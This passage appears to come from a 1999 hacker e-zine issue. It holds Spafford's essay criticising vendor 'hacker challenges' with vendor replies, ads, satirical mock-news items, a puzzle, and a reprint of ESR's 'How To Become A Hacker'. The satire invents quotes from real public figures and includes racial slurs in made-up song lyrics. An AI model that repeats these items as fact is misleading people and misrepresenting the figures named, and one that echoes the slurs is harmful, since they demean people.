reinforce the image that there should be some form of reward for
hacking through security measures. Neither of these are views we should
responsibly seek to promote.

Consider the nature of showing the security of a product. Does a
"challenge" meet the goal of testing, which is to increase one's
confidence in the correct functioning of the artifact? It really
doesn't, for a number of reasons:
o Few such "challenges" are conducted using established testing
techniques. They are ad hoc, random tests. Thus, there is no way of
determining final coverage. For instance, if 90% of all challenge
attacks are of the same variety, what has the "test" really shown?
(Consider testing a calculator. If you perform 10,000 tests, but
9000 of them are addition with zero, have you done a thorough job of
testing?)
o That no problems are found does not mean that no problems exist. It
may mean that the testers didn't expose them. Doing random,
black-box testing remotely is not likely to really test much of the
product. (Challenge testing is basically a form of black-box
testing.)
o That no problems are reported does not mean that no problems exist.
The "testers" might not have recognized them. (Look at how often
software is released with bugs, even after careful scrutiny -- users
don't always recognize anomalies.)
o That no problems are reported does not mean that no problems exist.
How do you know that the "testers" will report what they find? How
do you know the vendor is getting accurate data? If Jane Random
Hacker found a way to penetrate the product in a manner that vendor
monitoring didn't expose, it is possible she'd find more profitable
uses (later) for that information than informing the vendor about
it. Further, because of possible problems with the law, hackers
might not want to report success and draw attention to themselves.
o Simply because the vendor does not report a successful penetration
does not mean that one did not occur -- the vendor may choose not to
report it because it would reflect poorly on its product, or not
meet the narrow criteria for a "successful" penetration, or the
vendor may not be able to detect it happened. (How can anyone
outside prove otherwise?)
o Seldom do the really good experts, on either side of the fence,
participate in such exercises. Thus, anything done is usually done
by amateurs. (The "honor" of having won the challenge is not
sufficient to lure the good ones into the fray. Good consultants
command fees of several thousand $$ per day in some cases -- why
should they donate their time and names for what amounts to free
consulting and advertising?)

Also note that any such challenge also serves to aid potential hackers
in their later pursuits:
o It gives potential miscreants some period to practice breaking the
system without penalty. Any other time spent hacking at one of these
might result in legal action or worse. Isn't it nice the vendor is
giving free practice time to the bad guys? I hope all the potential
customers are equally pleased at this.
o It gives miscreants an excuse if they are caught trying to break into the
system later (e.g., "We thought the contest was still on.") This
might well weaken any legal action taken later.
o The vendor contest may actually even include some publication of
hacks that don't work -- thus helping reduce the effort to
compromise the system later.

Furthermore, the whole process sends the wrong message -- that we
should build things and then try to break them, or that there is some
prestige or glory in breaking systems. That isn't what we need.
Instead, we want to promote responsible behavior, using established
methods. We need to establish that security is something best done by
well-trained professionals, and that hacking into systems is not "job
training". (I've argued this point in more detail in "Are Computer
Break-Ins Ethical?", Journal of Systems and Software, Jan 1992, 17(1).)

Good security should be carefully designed in and tested using
established methods. Tiger teams have a role, but using them
(especially ad hoc teams) as a major means of establishing safety is
negligent. Security "contests" to demonstrate a system are worse, and
should be viewed negatively by potential customers. It should be
generally recognized that such contests cannot establish more than
cursory confidence in a product, are not a good means of testing, and
actually create a climate that may encourage or enable people to try to
break the product after it is in use.

If I was a potential customer of any security product, which of the
following, somewhat exaggerated approaches would be more likely to
convince me that a company had its act together? Which one is the
company more likely to be seeking to sell based on smoke and mirrors?
o Approach A: Our product was coded by a bunch of really talented
hackers and former system crackers who learned everything they know
on the IRC. We put our product up on the Internet for 6 months, and
offered a nifty backpack and some money to anyone who could break
in. No one claimed the prize. Obviously, ours is a superior
product.
o Approach B: Our company is certified as an ISO 9000 company. We
used formal software engineering approaches to design and build our
product, ending in full functional testing, D-U path testing, and
statement coverage to 98%. We also hired well-known independent
security experts A, B, and C under non-disclosure to examine the
code and identify weaknesses, and then conduct field trials. Company
X and University Y have also had the opportunity to examine and test
our product, and none of them have found flaws.

Approach "B" is clearly the one we want to encourage. Approach "A"
encourages cycles of "penetrate and patch" and that is what is wrong
with most mass-market software available today. However, vendors claim
that Approach "A" is what sells more product than Approach "B," in part
because it seems to inspire more confidence, and in part because it is
cheaper to produce software if they don't use an approach like "B".

If we, as a community and a profession, want better quality and more
trustworthy products, we must begin to demonstrate it. The best way is
in the marketplace, by showing a willingness to buy based on substance,
and not flash. Saying "no" to attempts to sell us products based on
"hacker challenges" is one way to do that.

Replies:
++++++++
Sameer Parekh, Community ConneXion, (sameer@c2.org
URL:http://www.c2.org/):

Most of Gene's points are very valid, and I agree with them. His points
are aimed at challenges promoted by a company in order to show that a
product is secure. On the other hand, the Community ConneXion
challenges are promoted in order to show that a product is *insecure*.

It's easy to prove insecurity, but hard to prove security. The
vendor-supported challenges are trying to prove security, which is
rather misguided. In proving insecurity though, our challenges are
rather simple, as they only require one counter-example to be proven
that a system is insecure.
- - - - - - -
Jon Wiederspan, ComVista (jon@comvista.com URL:
http://www.comvista.com/) :

We received a very similar letter from Mr. Spafford when we first began
our contest and posted an extensive reply on our site while it was in
operation. I will summarize the main points for Cipher readers:

1) Mr. Spafford says that these challenges are a poor way of testing
software. That is true, however it was never our purpose to test the
software by running a challenge. The testing has been completed or we
would not have been confident enough to place $10,000 on the line. The
main purpose of our security challenge was to promote awareness of the
existence of security options for Macintosh servers. It was never
intended as proof of the security of the system or to replace rigorous
testing.

2) Mr. Spafford says that these contests promote hacking. We disagree
with that entirely. By his argument, the Daytona 500 is responsible for
people driving too fast on highways. I think there are people who drive
as if they are on a race track (one passed me this morning on my way to
work) but it is clear that rules on the highway are different from
rules on the race track and no court in the land would let a person get
away with arguing differently. We clearly stated on our site the
limitations of the contest including a warning that we were not
condoning similar attacks on systems other than the one provided for
the contest.

3) Mr. Spafford says that these contests make it easier to break other
systems. Mr. Spafford is looking in the wrong place. Bulletin boards,
newsletters, Web sites and more all exist with information on how to
hack into systems. Books have been written on the subject, movies made,
and special investigative reports offered on television all on the
subject. Writing about what failed on our site will not help hackers
significantly. Our site also did not provide free practice to hackers
because *none of the attempts worked*. Practice is useless if you do
not at some point succeed.

4) Mr. Spafford says that it is wrong to test things by trying to break
them. I don't think he thought about what he was saying there. What is
beta testing but an attempt to find where software will break? Stress
testing for metal structures? Crash testing cars? It is a fact of life
that part of testing a product is to find where it will fail, which
means trying actively to break the product in a variety of ways.

In summary, it is our opinion that Mr. Spafford's letter has no bearing
on the challenge that we had online. He probably would have been better
served by investigating our site more thoroughly before writing the
letter.
- - - - - -
Jeff Weinstein, Netscape (jsw@netscape.com, URL:
http://home.netscape.com/people/jsw)

My quick reaction is that the Netscape Bugs Bounty is not a "hacker
challenge". It is a way to reward users for helping to find bugs that
get past us. I don't think that we make any claims such as "our
product must be secure because no one claimed our hacker prize". We
also don't view the bug bounty as a replacement for our own QA efforts,
but a supplement to it.
- - - - - -
Secure Computing Corporation, sponsors of the Sidewinder challenge reported
in Cipher EI#6, declined to comment.


AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$
! !
$ $
! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** !
$ $
! !
$$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$

www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre

<a href="www.2600.com</a">http://www.2600.com/">www.2600.com</a>
<a href="http://www.kevinmitnick.com></a>

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
<a href="One">http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////


@HWA

HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~

Don't be happy, worry.

IRC Security: Who to Trust
Contributed by siko
Thursday - March 25, 1999. 02:35AM GMT

These days the IRC waters can be just as dangerous as a raging inferno.
Op the wrong nick and you could lose an entire channel in a matter of
seconds.

"Anyone can download a script these days and deop the regular channel
members these days. The old days you had to load up telnet.exe, these days
you type /hack and you are good to go.", says IRC Security Expert Mark
Winters. "If you are really skilled, you could even do what is known as 'riding
a split'".

Certain IRC Networks are not prone to this type of hostile attack, such as
Dalnet and Undernet due to channel bots employed by the IRC network to
prevent such actions. The only trade off in the matter is Dalnet and Undernet
fucking blow.

A recent example of a hostile takeover would include a short takeover of
#wsvw1u, thought to be masterminded by 'vize' of Efnet. Vize held ops in the
channel for several minutes while attempting to harass and threaten Innerpulse
writer siko. Siko did not fret, however, since he noticed ops had been
restored during the trash talk session vize was putting on. Upon being banned
from #wsvw1u, vize entered #innerpulse, which was at the time opless to hurt
the self-respect level of channel members by calling them 'lame.'. This highly
original insult offended one member so much, he opened a windows nuker
and proceded to nuke vize 8 times before finally parting the channel with the
message "you will all be owned" (not in those letters... y0u w1ll 4ll b3
0wned).

What type of prevention are IRCOps on Efnet taking to stop hostile channel
takeover artists like this one? Innerpulse contacted #us-opers and asked for
answers.

"It is believed that users are responsible for their own channels and their
channels well being," said Disciple.

After several minutes, Innerpulse learned Disciple was not an IRCOp and
stopped giving a shit about his opinions.

Efnet Information


Ma$e Signs Deal With CDNow.com
Contributed by siko
Thursday - March 25, 1999. 01:46AM GMT

Bad Boy rap artist, Ma$e, has signed a deal with CDNow.com to write
and perform music aimed at Internet technologies. They will be compiled and
released under the upcoming album 'Internet World', second to his platinum
album, 'Harlem World'.

"I was excited about the offer because sometimes I'm just kickin it with my
homies on IRC and I get these ideas. I plan to rap about the trials and
tribulations brought on by the Internet, including taking channels on IRC,
packeting AntiOnline, playing all the ladies on America Online, among other
things.", said Ma$e yesterday at an official press conference. "Hopefully this
will let the world know about the struggles that exist on todays Internet."

Ma$e's first song that he has started production on in the studio is called
'Lookin at Me'. He shows off his lyrical prowess with lines such as 'Soon as I
join the channel people is like damn who is he, and please, I hope he don't
nuke me'. Another verse taking aim at 'lamers' goes: "And if you are a lamer,
and you got a net girlie, don't be real committed, because Ma$e will net-bang
her.".

Staying true to the game, there are several skits included on the cd. Among
the planned skits are Ma$e accidentally messing up his AOL Instant
Messages and telling Shania he will meet her at 7pm when he meant to send
the Instant Message to Faruka, a real black queen.

Ma$e describes his everyday troubles waking up and signing on in his song
'Niggaz Wanna DoS'. Ma$e shows he is a lyrical soldier with lines such as
'You wanna fuck with Ma$e, you'll get your wig rocked nigga, You wanna
fuck with Innerpulse, You'll get your IP nuked nigga.".

The album should be out in late July, 1999.


Doonesbury Author Reveals Source of
Information
Contributed by siko
Wednesday - March 24, 1999. 09:11PM GMT

Doonesbury is a well known comic strip that runs in thousands of
publications nationwide. The past couple strips run have included jargon from
the cyberculture underground, such as script kiddie and newbie. What started
as a portal to the public has swiftly turned into a mess.

"In an effort to show off my computer skills, I used the expert term 'tracing the
exploit to his isp number'", said G.B Trudea, the writer of Doonesbury. "But I
guess after my latest strip its kind of hard to hide the fact that I figured this out
in #rootworm of Undernet.".

"He wanted to know about computer crimes so he could showcase them in
this weeks strip. So basically I just told him everything I knew", said one
hacker who goes by the handle 'vortek'. "I think its cool the public will
understand what goes on behind the scenes. I mean, attention is the ultimate
goal of a 13 year old abused child.."

Innerpulse, although never a fan of Doonesbury in the past, has seen
computer related material in Doonesbury before. Images portraying long
nose, bony face geeks with glasses working hard at their computer 'hacking' is
nothing new to the strip. What is new to the strip, is the legal action being
brought against it by AntiOnline.com for its illegal use of the term "exploit", a
term they believe they own rights to.

Doonesbury Comic


Innerpulse Could 'Use more food' at the
Office
Contributed by siko
Wednesday - March 24, 1999. 08:00AM GMT

Innerpulse Media has decided to search for a second sponsor in hopes of
making a small profit to buy food for needy children. You can keep
Innerpulse.com running by clicking the banner on the page. Thank you, and
look for the new Innerpulse, dubbed the Innerpulse Network, coming January
16.. I mean 3 months later (just like antionline).


http://www.segfault.org/story.phtml?mode=2&id=36faccb8-03739440


NATO authorizes airstrikes on hackers

Silicon Valley, California -- Chat rooms were unusually deserted, spammers went on panicked last-minute
mail-bombing sprees and bomb shelters filled to overflowing today as gloom engulfed hackers waiting for
NATO strikes.

Hackers showed a mix of fear and defiance toward the Western military alliance, aware it could strike at any
moment against strategic hacker targets after yet another embarrassing vandalism of a U.S. Department of
Defense website.

"This waiting for strikes is killing me," said w4r3z_f14r3, a 22-year-old student in the controversial Computer
Science department at the Massachusetts Institute of Technology. "If they want to bomb us, they should do it
now so I can get back to cracking Afterlife II."

Graphics illegally uploaded to an Associated Press website accompanied a note which stated, "F1n1$h 7h1Z
60mb1n9 0r f4c3 my uur47h, I 4m l337!!! H4x0rs un173!" The web server was quickly downed in a flurry of
flamewars over the proper use of the word 'hacker' versus 'cracker' in the page.

Many college-age hackers stayed home rather than attending school, though most admit they would have
stayed home anyway.

Y2K websites issued detailed FAQs to threatened hackers in case of bombing, including information on how
long canned goods stay fresh in underground shelters, how to fix a misfiring diesel generator, and how to sow
grain in the field with a plow and oxen.

Bomb shelters, unused in emergency since DefCon 4, were cleaned up during the last NATO threat in August,
when the alliance previously announced its intention to launch airstrikes at the notorious hacker group Cult of
the Dead Cow. Most shelters have been turned into underground bunkers featuring ISDN lines with
triple-redundancy backups, as once the hackers moved in, they found the absence of sunlight and social
involvement enjoyable.

Despite the danger, supporters of hard-line hackers were defiant.

"NATOns will fire their missiles from a distance," said Lord Kreel, an NT cracker. "Meanwhile, I will be
cracking into the Pentagon with my friends in the Lackeys of Terror. We plan to install Windows on all of their
computers, which will cripple their systems beyond repair."

Opponents of "black hat" hacking think NATO strikes will actually increase the popularity of cracking among
the techno-elite, but cement the popular image of the hacker as a no-good techie pirate bent on stealing credit
card numbers and eating babies.

"Now, [crackers will] attack all the media sites, plastering the entire web with links to porno and warez sites,
and lag the whole net to hell", said hacker Frodo Majere. "If NATO thinks they will bend hackers with bombs,
they are dead wrong."

Supporters of the infamous jailed hacker Kevin Mitnick have reportedly been preparing to strike at well-known
pro-NATO companies and military organizations as soon as the first NATO bomb lands on hacker territory.

"We'll introduce Y2K bugs to systems where you'll never find them. We will end the disgusting
greed-infested system of monopolist capitalism by freeing information forever. Linux is the One, True God,"
said one hacker, before he was shot and killed by an enraged fanatic wearing a red "GNU NOT Linux"
headband, symbol of the underground terrorist organization FSF. A press release issued by the FSF's guerilla
leader, known only as RMS, claimed responsibility for the killing.

NATO's secretary-general Javler Selena authorized airstrikes against known hacker sites on Tuesday, after
hackers on the IRC channel #2600 rebuffed a last-ditch peace offer and gave out free root accounts on the
whitehouse.gov server.

"In the past, computer security was a war of escalation between system administrators and joy-riding
hackers," said a spokesperson for the anti-hacker group Freedom Through Oppression. "It's high time we
brought the war to the instigators and bombed these hacker scum back to the Stone Age. To make the Internet
safe for everyone, we must squash dissension once and for all. Countries have been nuked for less."

"If you don't stand up to the theft of intellectual property of innocent companies such as SysMicrosoft and
AppMicrosoft, you threaten American competitiveness and the ability to innovate," said President Gates, as
he sought -- and got -- support from congressional leaders for military action.

"We must halt the hackers and save the Internet for our children and the future of our country. The dirty,
despicable hackers will no longer disrupt websites to make fun of our institutions, or pollute the Information
Superhighway with filthy swear words," said former Vice President Al Gore, founder of the Internet, before he
suddenly toppled over and dumped core. "NTLDR not found. INVALID_BOOT_DEVICE in kernel32.exe
006383dhX00029393."
Posted on Fri 26 Mar 00:21:38 1999 GMT
Written by Potato <meersan@linuxmail.org>


Puzzle:
~~~~~~

How far apart are these two network cards?


---------------------| |-----------------------
| | | |
| card1 [=]-- coax --[=] card2 |
| | - | - | |
-------IIIIIIIIIIIIII| - \/ - |IIIIIIIIIIIIIIII-------


Hints: The connectors do not count
the answer is in inches
yes it is a 'trick' question
yes they are network cards
it is coaxial ethernet 10Mb/s
the drop in the loop is 25'


@HWA

HOW.TO How to hack part 3
~~~~~~~~~~~~~~~~~~

To be continued (probably) in a future issue... if time permits
and inclination is prevelant. ie: if & when I feel like it.. :p

Meanwhile read this:

http://www.nmrc.org/faqs/hackfaq/hackfaq.html

And especially, this:

http://www.tuxedo.org/~esr/faqs/hacker-howto.html

(published below in its entirety due to relevence
and elequence)...

$Date: 1999/03/26 09:18:00 $


( Translations into: French Spanish Italian German Japanese Korean Swedish Portuguese Russian available at site)

How To Become A Hacker

Why This Document?

As editor of the Jargon File, I often get email requests from enthusiastic network newbies asking (in effect) "how can I learn to be a wizard hacker?". Oddly enough
there don't seem to be any FAQs or Web documents that address this vital question, so here's mine.

If you are reading a snapshot of this document offline, the current version lives at http://www.tuxedo.org/~esr/faqs/hacker-howto.html.

What Is A Hacker?

The Jargon File contains a bunch of definitions of the term `hacker', most having to do with technical adeptness and a delight in solving problems and overcoming
limits. If you want to know how to become a hacker, though, only two are really relevant.

There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing
minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term `hacker'. Hackers built the Internet. Hackers made the Unix
operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and
other people in it know who you are and call you a hacker, you're a hacker.

The hacker mind-set is not confined to this software-hacker culture. There are people who apply the hacker attitude to other things, like electronics or music --
actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them "hackers" too -- and
some claim that the hacker nature is really independent of the particular medium the hacker works in. But in the rest of this document we will focus on the skills and
attitudes of software hackers, and the traditions of the shared culture that originated the term `hacker'.

There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into
computers and phreaking the phone system. Real hackers call these people `crackers' and want nothing to do with them. Real hackers mostly think crackers are
lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you
an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word `hacker' to describe crackers; this irritates real hackers no
end.

The basic difference is this: hackers build things, crackers break them.

If you want to be a hacker, keep reading. If you want to be a cracker, go read the alt.2600 newsgroup and get ready to do five to ten in the slammer after finding
out you aren't as smart as you think you are. And that's all I'm going to say about crackers.

The Hacker Attitude

Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you
have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.

But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these
things is important for you -- for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the
mind-set of masters -- not just intellectually but emotionally as well.

So, if you want to be a hacker, repeat the following things until you believe them:

1. The world is full of fascinating problems waiting to be solved.

Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical
delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving
problems, sharpening your skills, and exercising your intelligence.

If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is
sapped by distractions like sex, money, and social approval.

(You also have to develop a kind of faith in your own learning capacity -- a belief that even though you may not know all of what you need to solve a problem, if you
tackle just a piece of it and learn from that, you'll learn enough to solve the next piece -- and so on, until you're done.)

2. Nobody should ever have to solve a problem twice.

Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out
there.

To behave like a hacker, you have to believe that the thinking time of other hackers is precious -- so much so that it's almost a moral duty for you to share
information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.

(You don't have to believe that you're obligated to give all your creative product away, though the hackers that do are the ones that get most respect from other
hackers. It's consistent with hacker values to sell enough of it to keep you in food and rent and computers. It's consistent to use your hacking skills to support a
family or even get rich, as long as you don't forget you're a hacker while you're doing it.)

3. Boredom and drudgery are evil.

Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing
what only they can do -- solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil.

To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else
(especially other hackers).

(There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, or in order
to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice -- nobody who can think should ever be forced into
boredom.)

4. Freedom is good.

Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by -- and, given the
way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it
smother you and other hackers.

(This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to
get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is
not on offer.)

Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing -- they only like `cooperation' that they control. So
to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you
have to be willing to act on that belief.

5. Attitude is no substitute for competence.

To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion
athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work.

Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence --
especially competence at hacking, but competence at anything is good. Competence at demanding skills that few can master is especially good, and competence at
demanding skills that involve mental acuteness, craft, and concentration is best.

If you revere competence, you'll enjoy developing it in yourself -- the hard work and dedication will become a kind of intense play rather than drudgery. And that's
vital to becoming a hacker.

Basic Hacking Skills

The hacker attitude is vital, but skills are even more vital. Attitude is no substitute for competence, and there's a certain basic toolkit of skills which you have to have
before any hacker will dream of calling you one.

This toolkit changes slowly over time as technology creates new skills and makes old ones obsolete. For example, it used to include programming in machine
language, and didn't until recently involve HTML. But right now it pretty clearly includes the following:

1. Learn how to program.

This, of course, is the fundamental hacking skill. If you don't know any computer languages, I recommend starting with Python. It is cleanly designed, well
documented, and relatively kind to beginners. Despite being a good first language, it is not just a toy; it is very powerful and flexible and well suited for large projects.

But be aware that you won't reach the skill level of a hacker or even merely a programmer if you only know one language -- you need to learn how to think about
programming problems in a general way, independent of any one language. To be a real hacker, you need to have gotten to the point where you can learn a new
language in days by relating what's in the manual to what you already know. This means you should learn several very different languages.

If you get into serious programming, you will have to learn C, the core language of Unix (though it's not the one to try learning first thing). Other languages of
particular importance to hackers include Perl and LISP. Perl is worth learning for practical reasons; it's very widely used for active web pages and system
administration, so that even if you never write Perl you should learn to read it. LISP is worth learning for the profound enlightenment experience you will have when
you finally get it; that experience will make you a better programmer for the rest of your days, even if you never actually use LISP itself a lot.

It's best, actually, to learn all four of these (Python, C, Perl, and LISP). Besides being the most important hacking languages, they represent very different
approaches to programming, and each will educate you in valuable ways.

I can't give complete instructions on how to learn to program here -- it's a complex skill. But I can tell you that books and courses won't do it (many, maybe most of
the best hackers are self-taught). What will do it is (a) reading code and (b) writing code.

Learning to program is like learning to write good natural language. The best way to do it is to read some stuff written by masters of the form, write some things
yourself, read a lot more, write a little more, read a lot more, write some more ... and repeat until your writing begins to develop the kind of strength and economy
you see in your models.

Finding good code to read used to be hard, because there were few large programs available in source for fledgeling hackers to read and tinker with. This has
changed dramatically; open-source software, programming tools, and operating systems (all built by hackers) are now widely available. Which brings me neatly to
our next topic...

2. Get one of the open-source Unixes and learn to use and run it.

I'm assuming you have a personal computer or can get access to one (these kids today have it so easy :-)). The single most important step any newbie can take
towards acquiring hacker skills is to get a copy of Linux or one of the BSD-Unixes, install it on a personal machine, and run it.

Yes, there are other operating systems in the world besides Unix. But they're distributed in binary -- you can't read the code, and you can't modify it. Trying to learn
to hack on a DOS or Windows machine or under MacOS is like trying to learn to dance while wearing a body cast.

Besides, Unix is the operating system of the Internet. While you can learn to use the Internet without knowing Unix, you can't be an Internet hacker without
understanding it. For this reason, the hacker culture today is pretty strongly Unix-centered. (This wasn't always true, and some old-time hackers aren't happy about
it, but the symbiosis between Unix and the Internet has become strong enough that even Microsoft's muscle doesn't seem able to seriously dent it.)

So, bring up a Unix -- I like Linux myself but there are other ways (and yes, you can run both Linux and DOS/Windows on the same machine). Learn it. Run it.
Tinker with it. Talk to the Internet with it. Read the code. Modify the code. You'll get better programming tools (including C, Lisp, Python, and Perl) than any
Microsoft operating system can dream of, you'll have fun, and you'll soak up more knowledge than you realize you're learning until you look back on it as a master
hacker.

For more about learning Unix, see The Loginataka.

To get your hands on a Linux, see the Where can I get Linux.

3. Learn how to use the World Wide Web and write HTML.

Most of the things the hacker culture has built do their work out of sight, helping run factories and offices and universities without any obvious impact on how
non-hackers live. The Web is the one big exception, the huge shiny hacker toy that even politicians admit is changing the world. For this reason alone (and a lot of
other good ones as well) you need to learn how to work the Web.

This doesn't just mean learning how to drive a browser (anyone can do that), but learning how to write HTML, the Web's markup language. If you don't know how
to program, writing HTML will teach you some mental habits that will help you learn. So build a home page.

But just having a home page isn't anywhere near good enough to make you a hacker. The Web is full of home pages. Most of them are pointless, zero-content
sludge -- very snazzy-looking sludge, mind you, but sludge all the same (for more on this see The HTML Hell Page).

To be worthwhile, your page must have content -- it must be interesting and/or useful to other hackers. And that brings us to the next topic...

Status in the Hacker Culture

Like most cultures without a money economy, hackerdom runs on reputation. You're trying to solve interesting problems, but how interesting they are, and whether
your solutions are really good, is something that only your technical peers or superiors are normally equipped to judge.

Accordingly, when you play the hacker game, you learn to keep score primarily by what other hackers think of your skill (this is why you aren't really a hacker until
other hackers consistently call you one). This fact is obscured by the image of hacking as solitary work; also by a hacker-cultural taboo (now gradually decaying but
still potent) against admitting that ego or external validation are involved in one's motivation at all.

Specifically, hackerdom is what anthropologists call a gift culture. You gain status and reputation in it not by dominating other people, nor by being beautiful, nor by
having things other people want, but rather by giving things away. Specifically, by giving away your time, your creativity, and the results of your skill.

There are basically five kinds of things you can do to be respected by hackers:

1. Write open-source software.

The first (the most central and most traditional) is to write programs that other hackers think are fun or useful, and give the program sources to the whole hacker
culture to use.

(We used to call these works ``free software'', but this confused too many people who weren't sure exactly what ``free'' was supposed to mean. Many of us now
prefer the term ``open-source'' software).

Hackerdom's most revered demigods are people who have written large, capable programs that met a widespread need and given them away, so that now everyone
uses them.

2. Help test and debug open-source software

They also serve who stand and debug open-source software. In this imperfect world, we will inevitably spend most of our software development time in the
debugging phase. That's why any open-source author who's thinking will tell you that good beta-testers (who know how to describe symptoms clearly, localize
problems well, can tolerate bugs in a quickie release, and are willing to apply a few simple diagnostic routines) are worth their weight in rubies. Even one of these can
make the difference between a debugging phase that's a protracted, exhausting nightmare and one that's merely a salutary nuisance.

If you're a newbie, try to find a program under development that you're interested in and be a good beta-tester. There's a natural progression from helping test
programs to helping debug them to helping modify them. You'll learn a lot this way, and generate good karma with people who will help you later on.

3. Publish useful information.

Another good thing is to collect and filter useful and interesting information into Web pages or documents like FAQs (Frequently Asked Questions lists), and make
those generally available.

Maintainers of major technical FAQs get almost as much respect as open-source authors.

4. Help keep the infrastructure working.

The hacker culture (and the engineering development of the Internet, for that matter) is run by volunteers. There's a lot of necessary but unglamorous work that needs
done to keep it going -- administering mailing lists, moderating newsgroups, maintaining large software archive sites, developing RFCs and other technical standards.

People who do this sort of thing well get a lot of respect, because everybody knows these jobs are huge time sinks and not as much fun as playing with code. Doing
them shows dedication.

5. Serve the hacker culture itself.

Finally, you can serve and propagate the culture itself (by, for example, writing an accurate primer on how to become a hacker :-)). This is not something you'll be
positioned to do until you've been around for while and become well-known for one of the first four things.

The hacker culture doesn't have leaders, exactly, but it does have culture heroes and tribal elders and historians and spokespeople. When you've been in the
trenches long enough, you may grow into one of these. Beware: hackers distrust blatant ego in their tribal elders, so visibly reaching for this kind of fame is
dangerous. Rather than striving for it, you have to sort of position yourself so it drops in your lap, and then be modest and gracious about your status.

The Hacker/Nerd Connection

Contrary to popular myth, you don't have to be a nerd to be a hacker. It does help, however, and many hackers are in fact nerds. Being a social outcast helps you
stay concentrated on the really important things, like thinking and hacking.

For this reason, many hackers have adopted the label `nerd' and even use the harsher term `geek' as a badge of pride -- it's a way of declaring their independence
from normal social expectations. See The Geek Page for extensive discussion.

If you can manage to concentrate enough on hacking to be good at it and still have a life, that's fine. This is a lot easier today than it was when I was a newbie in the
1970s; mainstream culture is much friendlier to techno-nerds now. There are even growing numbers of people who realize that hackers are often high-quality lover
and spouse material. For more on this, see Girl's Guide to Geek Guys.

